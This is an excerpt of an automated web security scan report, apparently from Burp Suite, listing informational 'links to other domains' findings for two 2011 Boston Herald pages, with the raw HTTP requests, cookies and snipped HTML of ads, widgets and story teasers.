<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif" alt="Comments"><a href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=biz&position=">
...[SNIP]...
<a href="/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/fabb2e_fin_01282011.jpg" alt="LIVELY DISCUSSION: Panel members, from left, Olivier Blanchard, Robert Gordon and N. Gregory Mankiw talked about fiscal policy at an MIT panel discussion yesterday."></a>
...[SNIP]...
<a href="/business/general/view/20110128mexican_lovers_its_fiesta_time_hub_sees_flood_of_eateries_serving_up_south-of-the-border_cuisine/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/86c01a_table_01282011.jpg" alt="SPICING IT UP: Charlie Larner, left, and Michael Winter stand inside the soonto-
be Mija Cantina & Tequila Bar inside a renovated Sam&#x2019;s Cafe at Faneuil Hall
Marketplace.">
</a>
...[SNIP]...
<div style="float: left; background-color:#fff;width:175px; padding:20px 5px; margin:0px; height:260px; overflow:hidden;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<span class="bold" /><a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE">Quote:</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockRank.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">A-Z List</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/HighLow.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">52 Week High/low</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&amp;idx=3&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Index Performance</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Market Movers</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/FundRank.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">A-Z List</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/etfreturns/ETFReturns.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a>
...[SNIP]...
<td class="t4" align="left" height="15" colspan="5"><a href="http://www.bankrate.com/finance/mortgages/bankrate-com-averages.aspx?pid=p:bhn" class="head-link">Overnight
Averages</a>
...[SNIP]...
<td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/mortgages/?pid=p:bhn&amp;prods=1" class="sidebar-link">30 yr fixed mtg</a>
...[SNIP]...
<td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=1&amp;prodtype=M&amp;thisponsor=cf1&amp;ad=mtg&amp;nav=mtg30year_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_up_brm.gif" width="11" height="6" vspace="4" /></td></tr><tr><td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/home-equity/?pid=p:bhn&amp;prods=50" class="sidebar-link">$30K HELOC</a></td><td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=50&amp;prodtype=L&amp;ad=loan&amp;nav=heloc30k_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_ball.gif" width="11" height="1" vspace="4" /></td></tr><tr><td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/auto/?pid=p:bhn&amp;prods=39" class="sidebar-link">48 month new car loan</a>
...[SNIP]...
<td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=39&amp;prodtype=A&amp;ad=auto&amp;nav=48mo_newcar_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_dn_brm.gif" width="11" height="6" vspace="4" /></td></tr><tr><td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/cd-investments/?pid=p:bhn&amp;prods=15&amp;local=true" class="sidebar-link">1 yr CD</a></td><td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=15&amp;prodtype=D&amp;ad=dep&amp;nav=1yearcd_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_up_brm.gif" width="11" height="6" vspace="4" /></td>
...[SNIP]...
</div>


    <iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&amp;width=300&amp;height=300&amp;header=true&amp;colorscheme=light&amp;font&amp;border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.267. http://www.bostonherald.com/business/general/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view.bg

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /business/general/view.bg?articleid=1312531&srvc=home&position=rated HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:12:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Business &amp; Markets - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/business/general/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Fgeneral%2Fview.bg%3Farticleid%3D1312531%26position%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(80) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Wal-Mart seeks opening');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(80) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
"Click to open photo gallery: Hey, neighborhood" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4882','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/2204fb_WalMart_12032009.JPG" alt="" /></A>
...[SNIP]...
<A HREF="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4882','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/691198_WMgraphicB012811.jpg" alt="Boston Herald"></a>
...[SNIP]...
<div id="buyPhotosBar">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/"><img src="/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/">Purchase Herald Photos</a>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/business/general/view/20110123wal-mart_vs_civil_war_site_battle_heads_to_court/"><img src="http://multimedia.heraldinteractive.com/images/20110123/stp/d0a779_battle.jpg" alt="Wal-Mart vs. Civil War site: battle heads to court" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.268. http://www.bostonherald.com/entertainment/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /entertainment/?srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:05:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 103253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<!-- Ad: wallpaper takeover -->


   <link rel="alternate" title="Entertainment - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/entertainment/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="http://bostonherald.com/entertainment/lifestyle/view.bg?articleid=1312514&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="261" width="315" alt="Ways to take the chill out of winter"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="http://bostonherald.com/entertainment/lifestyle/view.bg?articleid=1312514&position=0">
...[SNIP]...
<a href="http://bostonherald.com/entertainment/movies/reviews/view.bg?articleid=1312524&position=1"><img class="blog_tease" src="http://multimedia.heraldinteractive.com/images/20110128/stp/bdc508_Rite_01282011.jpg" alt="ALL WRONG: Anthony Hopkins and Colin O&#x2019;Donoghue star in &#x2018;The Rite,&#x2019; an &#x2018;Exorcist&#x2019;-inspired thriller."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="http://bostonherald.com/entertainment/movies/reviews/view.bg?articleid=1312524&position=0">
...[SNIP]...
<a href="http://bostonherald.com/entertainment/movies/reviews/view.bg?articleid=1312518&srvc=edge&position=2"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more butt than you can shake a wrench at in &#x2018;The Mechanic,&#x2019; a remake of the Charles Bronson film directed by Michael Winner."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/entertainment/movies/reviews/view.bg?articleid=1312518&format=comments&srvc=edge&position=2">
...[SNIP]...
<a href="http://bostonherald.com/entertainment/music/general/view.bg?articleid=1312501&srvc=edge&position=3"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/bb4051_Banditas_01282011.jpg" alt="TWO OF A KIND: Hayley Thompson-King, left, and Molly Maltezos provide the harmony for Banditas."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/entertainment/music/general/view.bg?articleid=1312501&format=comments&srvc=edge&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="http://bostonherald.com/entertainment/music/general/view.bg?articleid=1312501&position=0">
...[SNIP]...
<a href="/users/register/?pre_select=90">
<img class="thumb" border="0" src="http://cache.heraldinteractive.com/images/version5.0/site_images/edge/spread_the_love_177x57.gif" alt="Spread the Love" />
</a>
...[SNIP]...
<a href="/entertainment/arts_culture/view/20110127cheap_thrills">
<img class="thumb" border="0" src="http://cache.heraldinteractive.com/images/version5.0/site_images/edge/cheap_thrills_177x57.gif" alt="Cheap_thrills" />
</a>
...[SNIP]...
<a href="/entertainment/music/general/view/20110128gigs_music_for_your_weekend">
<img class="thumb" border="0" src="http://cache.heraldinteractive.com/images/version5.0/site_images/edge/gigs_around_town_177x57.gif" alt="Gigs_around_town" />
</a>
...[SNIP]...
<a href="/entertainment/movies/reviews/view/20110128zenith_at_top_of_its_game/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/0c3b6e_Zenith_01282011.jpg" alt="MAD WORLD: Peter Scanavino stars in &#x2018;Zenith,&#x2019; about a dystopian future." /></a>
...[SNIP]...
<a href="/entertainment/television/general/view/20110128oprah_protege_nate_berkus_has_designs_on_daytime/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/cccb20_nberkus012811.jpg" alt="Nate Berkus." /></a>
...[SNIP]...
<a href="/entertainment/lifestyle/view/20110128gotta_love_it/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/31c0bc_ltpWatch012811.jpg" alt="Watch: &lsquo;Portlandia&rsquo;" /></a>
...[SNIP]...
<a href="/entertainment/health/nutrition/view/20110126jack_lalanne_changed_exercising_but_he_didnt_change_many_bodies/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/ff0551_jlalanne012611.jpg" alt="In this Nov. 7, 1975 file photo, fitness expert Jack LaLanne, 61, comes out of the chilly water after a successful swim from the Marin County side along the Golden Gate Bridge to San Francisco." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/entertainment/health/nutrition/view/20110126jack_lalanne_changed_exercising_but_he_didnt_change_many_bodies/format=comments&srvc=edge&position=also">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/entertainment/food_dining/reviews/view/20110128darryls_raises_bar_on_soul_food_music/format=comments&srvc=edge&position=also">
...[SNIP]...
<a href="/entertainment/arts_culture/view/20110127forever_young_theaters_the_fountain_of_youth_for_4-foot-11_harvard_law_instructor/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/39b0d8_garden_01272011.jpg" alt="CHILD&#x2019;S PLAY: Katherine Leigh Doherty, left, and Jennifer Beth Glick perform in &#x2018;The Secret Garden.&#x2019;" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/entertainment/arts_culture/view/20110127forever_young_theaters_the_fountain_of_youth_for_4-foot-11_harvard_law_instructor/format=comments&srvc=edge&position=also">
...[SNIP]...
